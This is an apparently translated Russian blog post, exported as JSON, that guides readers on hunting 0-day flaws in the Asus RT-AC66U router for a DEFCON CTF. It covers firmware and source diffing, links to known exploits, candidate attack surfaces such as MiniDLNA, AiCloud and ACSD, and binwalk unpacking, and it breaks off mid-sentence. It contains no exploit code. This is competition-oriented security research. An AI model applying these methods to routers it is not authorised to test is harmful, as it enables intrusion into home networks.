{"id":230469,"date":"2014-07-21T13:02:03","date_gmt":"2014-07-21T09:02:03","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=230469"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=230469","title":{"rendered":"<span class=\"post_title\">\u0412\u0437\u043b\u0430\u043c\u044b\u0432\u0430\u0435\u043c Asus RT-AC66U \u0438 \u043f\u043e\u0434\u0433\u043e\u0442\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c\u0441\u044f \u043a SOHOpelesslyBroken CTF<\/span>"},"content":{"rendered":"<div class=\"content html_format\">       \u041d\u0430\u043a\u043e\u043d\u0435\u0446-\u0442\u043e \u043d\u0430\u0441\u0442\u0430\u043b \u0438\u044e\u043b\u044c, \u0432\u0440\u0435\u043c\u044f \u0441\u043e\u0431\u0438\u0440\u0430\u0442\u044c\u0441\u044f \u043d\u0430 DEFCON. \u0424\u043e\u043b\u043b\u043e\u0432\u044c\u0442\u0435 <a href=\"https:\/\/twitter.com\/defconparties\">@defconparties<\/a> \u0432 \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435 \u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0439\u0442\u0435\u0441\u044c, \u043a\u0430\u043a\u0438\u0435 <a href=\"http:\/\/defcne.net\/villages\/22\">\u043c\u0435\u0441\u0442\u0435\u0447\u043a\u0438<\/a> \u043f\u043e\u0441\u0435\u0442\u0438\u0442\u044c \u0438 \u043d\u0430 \u043a\u0430\u043a\u0438\u0435 <a href=\"https:\/\/www.defcon.org\/html\/defcon-22\/dc-22-schedule.html\">\u0434\u043e\u043a\u043b\u0430\u0434\u044b<\/a> \u0441\u0445\u043e\u0434\u0438\u0442\u044c.<\/p>\n<p>  \u0412 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u0431\u0443\u0434\u0435\u0442 \u043d\u043e\u0432\u043e\u0435 \u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u2014 <a href=\"http:\/\/sohopelesslybroken.com\/\">SOHOpelesslyBroken<\/a>, \u043e\u0442 ISE \u0438 EFF. \u0426\u0435\u043b\u044c <a href=\"http:\/\/sohopelesslybroken.com\/track0.php\">Track 0<\/a> \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0445 \u0431\u0435\u0441\u043f\u0440\u043e\u0432\u043e\u0434\u043d\u044b\u0445 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445. <a href=\"http:\/\/sohopelesslybroken.com\/track1.php\">Track 1<\/a> \u0431\u0443\u0434\u0435\u0442 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442\u044c \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 CTF \u043f\u0440\u044f\u043c\u043e \u0432\u043e \u0432\u0440\u0435\u043c\u044f DEFCON. CTF\u044b \u0432\u0441\u0435\u0433\u0434\u0430 \u043e\u0447\u0435\u043d\u044c \u0432\u0435\u0441\u0435\u043b\u044b\u0435, \u0430 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u044d\u0442\u043e\u0442 \u043f\u043e\u0434\u0440\u0430\u0437\u0443\u043c\u0435\u0432\u0430\u0435\u0442 \u0432\u0437\u043b\u043e\u043c \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0436\u0435\u043b\u0435\u0437\u0430, \u0447\u0442\u043e \u0432\u0435\u0441\u0435\u043b\u0435\u0435 \u0432\u0434\u0432\u043e\u0439\u043d\u0435!<\/p>\n<p>  <img decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/63d\/187\/72e\/63d18772e095c8dcad4f18e8c9bc4ed3.png\" alt=\"image\"\/><br \/>  <i>\u0410\u0433\u0430, \u044d\u0442\u043e \u043c\u043e\u0435 \u0440\u0430\u0431\u043e\u0447\u0435\u0435 \u043c\u0435\u0441\u0442\u043e =P<\/i><\/p>\n<p>  \u041c\u0435\u043d\u044f \u043e\u0447\u0435\u043d\u044c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u0435\u0442 <a href=\"https:\/\/openwireless.org\/\">EFF Open Wireless Router<\/a> (\u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0447\u0438\u043a\u0430, \u043a \u0441\u043b\u043e\u0432\u0443, \u0442\u043e\u0436\u0435), \u043d\u043e \u043e\u043d\u0438 \u043f\u043e\u043a\u0430 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u043e\u0431 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435. \u0412 <a href=\"http:\/\/sohopelesslybroken.com\/track0.php\">\u043f\u0440\u0430\u0432\u0438\u043b\u0430\u0445 \u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u044f<\/a> \u0437\u043d\u0430\u0447\u0438\u0442\u0441\u044f <a href=\"https:\/\/wikidevi.com\/wiki\/ASUS_RT-AC66U\">ASUS RT-AC66U<\/a> (HW Ver. A2) [Version 3.0.0.4.266] \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430. \u0423 \u043c\u0435\u043d\u044f \u0435\u0441\u0442\u044c \u043b\u0438\u0448\u043d\u0438\u0439 RT-AC66U \u0434\u043e\u043c\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u0440\u0435\u0448\u0438\u043b \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0442\u0443\u0442\u043e\u0440\u0438\u0430\u043b \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u043e\u0432 <s>\u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u044f<\/s> CTF<a name=\"habracut\"><\/a><\/p>\n<h5>\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430<\/h5>\n<p>  \u041f\u0435\u0440\u0432\u044b\u043c \u0434\u0435\u043b\u043e\u043c, \u043d\u0443\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443 \u0438 \u0435\u0435 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434. \u041a \u0441\u0447\u0430\u0441\u0442\u044c\u044e, Asus RT-AC66U \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0440\u043e\u0432\u0430\u043d \u043f\u043e\u0434 GPL, \u0438 \u043d\u0435 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u0440\u0443\u0434\u0430 \u043d\u0430\u0439\u0442\u0438 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435. \u0412\u0435\u0440\u0441\u0438\u044f, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f \u0432 CTF, \u0441\u0442\u0430\u0440\u0430\u044f, \u043e\u0442 2012 \u0433\u043e\u0434\u0430. \u0427\u0442\u043e\u0431\u044b \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0448\u0435, \u043c\u044b \u0432\u043e\u0437\u044c\u043c\u0435\u043c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443 \u0438 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0438 \u0432\u0435\u0440\u0441\u0438\u0439 \u043e\u0442 v3.0.0.4.266 \u0434\u043e v3.0.0.4.376.1123 (\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u0432\u0435\u0440\u0441\u0438\u044f \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0438\u044f \u0441\u0442\u0430\u0442\u044c\u0438):<\/p>\n<p>  <a href=\"http:\/\/ftp.tekwind.co.jp\/pub\/asustw\/wireless\/RT-AC66U\/FW_RT_AC66U_VER3004266.zip\">Asus RT-AC66u v3.0.0.4.266&nbsp;&#8212; \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0430<\/a><br \/>  <a href=\"http:\/\/ftp.tekwind.co.jp\/pub\/asustw\/wireless\/RT-AC66U\/GPL_RT_AC66U_VER3004266.zip\">Asus RT-AC66u v3.0.0.4.266&nbsp;&#8212; \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434<\/a><br \/>  <a href=\"http:\/\/dlcdnet.asus.com\/pub\/ASUS\/wireless\/RT-AC66U\/FW_RT_AC66U_30043761123.zip\">Asus RT-AC66u v3.0.0.4.376.1123 \u2014 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0430<\/a><br \/>  <a href=\"http:\/\/dlcdnet.asus.com\/pub\/ASUS\/wireless\/RT-AC66U\/GPL_RT-AC66U_30043761123.zip\">Asus RT-AC66u v3.0.0.4.376.1123 \u2014 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434<\/a><\/p>\n<p>  \u041c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0431\u044b\u043b\u043e \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043e \u043c\u0435\u0436\u0434\u0443 \u044d\u0442\u0438\u043c\u0438 \u0434\u0432\u0443\u043c\u044f \u0432\u0435\u0440\u0441\u0438\u044f\u043c\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043c\u044b \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0438\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439:<br \/>  <a href=\"http:\/\/www.asus.com\/Networking\/RTAC66U\/HelpDesk_Download\/\">www.asus.com\/Networking\/RTAC66U\/HelpDesk_Download\/<\/a><br \/>  <img decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/b59\/d50\/a95\/b59d50a95126659725c869616fdf5691.png\" alt=\"image\"\/><\/p>\n<p>  \u041f\u043e \u043f\u0440\u0430\u0432\u0438\u043b\u0430\u043c \u043a\u043e\u043d\u043a\u0443\u0440\u0441\u0430, \u043c\u044b \u0434\u043e\u043b\u0436\u043d\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c. \u041c\u043e\u0436\u043d\u043e \u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0447\u0442\u043e\u0431\u044b \u043d\u0430\u0431\u0440\u0430\u0442\u044c \u043f\u043e\u0431\u043e\u043b\u044c\u0448\u0435 \u043e\u0447\u043a\u043e\u0432. \u0415\u0441\u043b\u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0438\u043b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u0435\u0437 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e \u043d\u0435\u0439, \u0430 \u0432\u044b \u0441\u043c\u043e\u0433\u043b\u0438 \u0435\u0435 \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0442\u043e \u043e\u043d\u0430 \u0432\u0441\u0435-\u0435\u0449\u0435 \u0431\u0443\u0434\u0435\u0442 \u0441\u0447\u0438\u0442\u0430\u0442\u044c\u0441\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e (\u0434\u0430\u0432\u0430\u0439\u0442\u0435 \u043d\u0435 \u0431\u0443\u0434\u0435\u043c \u043e\u0431\u0441\u0443\u0436\u0434\u0430\u0442\u044c \u0442\u0435\u0440\u043c\u0438\u043d\u043e\u043b\u043e\u0433\u0438\u044e).<\/p>\n<p>  \u0418\u0442\u0430\u043a, \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434, \u043d\u0430\u0441\u0442\u0430\u043b\u043e \u0432\u0440\u0435\u043c\u044f \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u044c \u0435\u0433\u043e. <a href=\"https:\/\/trailofbits.github.io\/ctf\">CTF Field Guide<\/a> \u043e\u0442 Trail of Bits \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0445\u043e\u0440\u043e\u0448\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u044b \u043f\u043e <a href=\"https:\/\/trailofbits.github.io\/ctf\/vulnerabilities\/source.html\">\u0430\u0443\u0434\u0438\u0442\u0443 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430<\/a>. \u041c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u044b, \u0432\u0440\u043e\u0434\u0435 <a href=\"http:\/\/www.scootersoftware.com\/\">Beyond Compare<\/a>, <a href=\"http:\/\/www.araxis.com\/merge\/\">Araxis Merge<\/a> \u0438 <a href=\"http:\/\/winmerge.org\/\">WinMerge<\/a> \u043f\u043e\u0434 Windows, \u0438\u043b\u0438 <a href=\"http:\/\/meldmerge.org\/\">Meld<\/a>, \u0435\u0441\u043b\u0438 \u0432\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0435 Linux.<br \/>  \u0411\u0443\u0434\u0435\u043c \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0441 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0435\u0439 &quot;\/asuswrt\/release\/src\/router\/&quot;. \u0421\u0440\u0430\u0432\u043d\u0438\u043c \u0434\u0432\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 Meld:<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/429\/18f\/337\/42918f337c307a8647f025bf259290ae.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/429\/18f\/337\/42918f337c307a8647f025bf259290ae.png\" height=\"363\" width=\"640\"\/><\/a><\/p>\n<p>  \u0423 \u044d\u0442\u043e\u0433\u043e \u0440\u043e\u0443\u0442\u0435\u0440\u0430 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u043c\u043d\u043e\u0433\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u0415\u0441\u043b\u0438 \u0432\u044b \u0445\u043e\u0442\u0438\u0442\u0435 \u043d\u0430\u0439\u0442\u0438 0-day, \u0432\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u0443\u0431\u0435\u0434\u0438\u0442\u044c\u0441\u044f, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u043d\u0430\u0448\u043b\u0438 \u0434\u043e \u0432\u0430\u0441 (\u0438, \u043f\u043e\u0432\u0435\u0440\u044c\u0442\u0435, \u044d\u0442\u043e \u0441\u0430\u043c\u0430\u044f \u0441\u043b\u043e\u0436\u043d\u0430\u044f \u0447\u0430\u0441\u0442\u044c). \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u0440\u0438\u043c\u0435\u0440\u0430:  <\/p>\n<ul>\n<li><a href=\"http:\/\/infosec42.blogspot.com.br\/2013\/07\/exploit-asus-rt-ac66u-remote-root.html\">ASUS RT-AC66U Remote Root (Broadcom ACSD)<\/a><\/li>\n<li><a href=\"http:\/\/www.securityfocus.com\/archive\/1\/526942\">ASUS RT-N66U Router \u2014 HTTPS Directory traversal and full file access and credential disclosure vuln<\/a><\/li>\n<li><a href=\"https:\/\/hatriot.github.io\/blog\/2013\/06\/05\/asus-rt56u-remote-command-injection\/\">Asus RT56U Remote Command Injection<\/a><\/li>\n<li><a href=\"http:\/\/securityevaluators.com\/knowledge\/case_studies\/routers\/asus_rtn56u.php\">Taking over the ASUS RT-N56U and RT-AC66U<\/a><\/li>\n<li><a href=\"http:\/\/arstechnica.com\/security\/2014\/02\/dear-asus-router-user-youve-been-pwned-thanks-to-easily-exploited-flaw\/\">Dear Asus router user: You\u2019ve been pwned, thanks to easily exploited flaw (Asusgate)<\/a><\/li>\n<li><a href=\"http:\/\/osvdb.com\/search?search%5Bvuln_title%5D=asus&amp;amp;search%5Btext_type%5D=alltext\">OSVDB<\/a><\/li>\n<\/ul>\n<p>  \u0423 \u0432\u0430\u0441 \u043e\u0442\u043d\u0438\u043c\u0443\u0442 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043e\u0447\u043a\u043e\u0432, \u0435\u0441\u043b\u0438 \u0432\u0430\u0448\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b \u0442\u0440\u0435\u0431\u0443\u044e\u0442 \u043e\u0441\u043e\u0431\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438\u043b\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438. \u0422\u0430\u043a \u0447\u0442\u043e, \u0435\u0441\u043b\u0438 \u0432\u044b \u0445\u043e\u0442\u0438\u0442\u0435 \u043d\u0430\u0431\u0440\u0430\u0442\u044c \u043c\u043d\u043e\u0433\u043e \u043e\u0447\u043a\u043e\u0432, \u0432\u0430\u043c \u0441\u0442\u043e\u0438\u0442 \u043d\u0430\u0446\u0435\u043b\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u0443\u044e \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 \u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/5c5\/22d\/fde\/5c522dfde0fcb2f6b6ea38fa6c4edd1f.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/5c5\/22d\/fde\/5c522dfde0fcb2f6b6ea38fa6c4edd1f.png\" height=\"330\" width=\"400\"\/><\/a><\/p>\n<p>  \u0412\u043e \u0432\u043a\u043b\u0430\u0434\u043a\u0435 \u00ab\u041f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f USB\u00bb \u0432 RT-AC66U \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b, \u0432\u0440\u043e\u0434\u0435 FTP, DLNA, NFS \u0438 Samba.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/cd2\/b3f\/0e3\/cd2b3f0e317a7ebf99c5269863e6fb1b.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/cd2\/b3f\/0e3\/cd2b3f0e317a7ebf99c5269863e6fb1b.png\" height=\"272\" width=\"400\"\/><\/a><\/p>\n<p>  MiniDLNA \u0442\u043e\u0436\u0435 \u043e\u0442\u043b\u0438\u0447\u043d\u0430\u044f \u0446\u0435\u043b\u044c. \u0412 \u043d\u0435\u043c \u043c\u043e\u0436\u043d\u043e \u043b\u0435\u0433\u043a\u043e \u043d\u0430\u0439\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f <a href=\"http:\/\/shadow-file.blogspot.com.br\/2014\/05\/infiltrate-2014.html\">\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435<\/a> <a href=\"https:\/\/twitter.com\/zcutlip\">Zachary Cutlip<\/a>&#8216;\u0430, \u0442.\u043a. \u043e\u043d \u043b\u043e\u043c\u0430\u043b \u044d\u0442\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0443 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/217\/2d3\/f69\/2172d3f69b906aeb8ea8f3def1debf6a.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/217\/2d3\/f69\/2172d3f69b906aeb8ea8f3def1debf6a.png\" height=\"363\" width=\"640\"\/><\/a><\/p>\n<p>  \u0414\u0440\u0443\u0433\u0438\u043c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u043c \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f AiCloud \u2014 \u043e\u043d \u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0435\u0442 \u0432\u0430\u0448\u0443 \u0434\u043e\u043c\u0430\u0448\u043d\u044e\u044e \u0441\u0435\u0442\u044c \u0441 \u043e\u043d\u043b\u0430\u0439\u043d-\u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435\u043c \u0438 \u0434\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u0441 \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430:<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/3c4\/027\/10a\/3c402710ad893082c79cdbc8be222fb4.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/3c4\/027\/10a\/3c402710ad893082c79cdbc8be222fb4.png\" height=\"330\" width=\"400\"\/><\/a><\/p>\n<h5>Forensic<\/h5>\n<p>  \u041f\u043e\u043a\u0430 \u0447\u0430\u0441\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0438\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434, forensics-\u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0431\u0443\u0434\u0443\u0442 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u044b\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c binwalk \u0438 fmk:<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/ef7\/a54\/c3d\/ef7a54c3d63c16a6e39b4583d11ca2c5.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/ef7\/a54\/c3d\/ef7a54c3d63c16a6e39b4583d11ca2c5.png\" height=\"138\" width=\"400\"\/><\/a><\/p>\n<p>  \u0412\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u043f\u043e\u043c\u043d\u0438\u0442\u044c <a href=\"https:\/\/github.com\/bmaia\/binwally\">binwally<\/a> \u2014 \u0443\u0442\u0438\u043b\u0438\u0442\u0443, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u044f \u043d\u0430\u043f\u0438\u0441\u0430\u043b \u0434\u043b\u044f <a href=\"http:\/\/w00tsec.blogspot.com\/2013\/12\/binwally-directory-tree-diff-tool-using.html\">\u043d\u0430\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u0440\u0430\u0437\u043d\u0438\u0446\u044b \u043c\u0435\u0436\u0434\u0443 \u0434\u0432\u0443\u043c\u044f \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u043c\u0438 \u0434\u0435\u0440\u0435\u0432\u044c\u044f\u043c\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c fuzzy hashing<\/a>. \u0412 Binwalk \u0435\u0441\u0442\u044c \u0441\u0432\u043e\u044f \u043e\u043f\u0446\u0438\u044f \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f fuzzy hashing \u043c\u0435\u0436\u0434\u0443 \u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0438 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f\u043c\u0438.<br \/>  <a href=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/3a5\/78e\/bbe\/3a578ebbeb7cfe258eac69e461fd8e0d.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/habrastorage.org\/getpro\/habr\/post_images\/3a5\/78e\/bbe\/3a578ebbeb7cfe258eac69e461fd8e0d.png\" height=\"250\" width=\"400\"\/><\/a><\/p>\n<p>  \u0411\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u0439 (\u0432\u0440\u043e\u0434\u0435 Asus) \u043d\u0435 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u044e\u0442 \u0446\u0435\u043b\u0438\u043a\u043e\u043c \u0432\u0435\u0441\u044c \u043a\u043e\u0434. \u0412\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0432\u0430\u043c \u043f\u0440\u0438\u0434\u0435\u0442\u0441\u044f \u0440\u0435\u0432\u0435\u0440\u0441\u0438\u0442\u044c \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u044b \u0438 \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a\u0438, \u0447\u0442\u043e\u0431\u044b \u043d\u0430\u0439\u0442\u0438 \u0445\u043e\u0440\u043e\u0448\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c. \u0411\u0438\u043d\u0430\u0440\u043d\u0438\u043a \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u00abACSD\u00bb \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0435\u043d \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0435\u0433\u043e \u0443\u0431\u0440\u0430\u043b\u0438 \u0438\u0437 \u043d\u043e\u0432\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 (v3.0.0.4.374.130+) \u0438\u0437-\u0437\u0430 <a href=\"http:\/\/infosec42.blogspot.com\/2013\/07\/exploit-asus-rt-ac66u-remote-root.html\">\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c<\/a>, \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u043e\u0439 <a 